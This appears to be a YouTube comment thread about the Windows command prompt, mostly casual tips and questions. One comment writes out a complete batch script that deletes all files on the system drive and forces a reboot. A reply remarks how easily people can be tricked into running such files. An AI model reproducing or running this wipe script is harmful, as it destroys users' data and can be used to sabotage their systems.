I "still" to this day put the slash around the other way for a follow on directory because of spending 10 years using an Amiga from 1990 till 2000. It's now 11 years later and still it happens :( old habits die hard.
Not to be a typical techy know it all, but at around 1:42, you only have to type "cd p" really, then press tab and the command line will autocomplete the rest of the entry. Also pressing tab straight off the bat will cycle through the dir files alphabetically.
i still have this operative system on my second computer its sucks and the computer crashed when i tryed to open flipper XD but i can fix it im sure about it and that computer is old really old 1958 or something but i have to writh c:pogramefiles:// open room. something
@Bruceification73 along those lines, the following program should not be run under any circumstances, as it will wipe your hard drive and even delete all the boot files so it turns ur computer into a pile of crap: @echo off title Full System Wipe color 0c cd.. cd.. cd.. cd.. del %systemdrive%\*.*/f/s/q shutdown -r -f -t 00 as you can see it is dressed up a little. That is not necessary but I decided to throw it in there. save as whatever.bat, and this file will own you.
@Bruceification73 Yes there are quite a few way to fuck up your system using batch files, but you would have to be extremely ignorant to actually run any of them. Although it's very very easy to trick someone, with said ignorance, into running pretty much anything :\
so how can i get to the like internet options and stuff i need to configure it so i can plug a wire to the back of the computer to my xbox so it can be online,
I'm not sure if you would do that through the command prompt. You would need ot use a crossover cable, and some third party software most likely, but I'm not an XBox person so I have no idea.
Don't forget there's like five million other commands for the CMD that are actually extremely useful. Making batch files for them things things like this is actually really helpful.
is it possible to change website using cmd?

@murphygp Yah, I didn't know anything about the Command Prompt when I made this video. I just thought it was neat. This is almost 3 years old now.

@dmanbiker "taskkill /f /im explorer.exe" gives you a slight performance boost when playing full screen games :P
"explorer.exe" to undo any changes
or "start explorer.exe"

lol that was an old comment, I figured it out not long after posting that.
Also, that doesn't work, at least not in XP.
It's just E:
But it might work in vista, never tried. (Never had to, thank god. I'd sooner run Ubuntu)
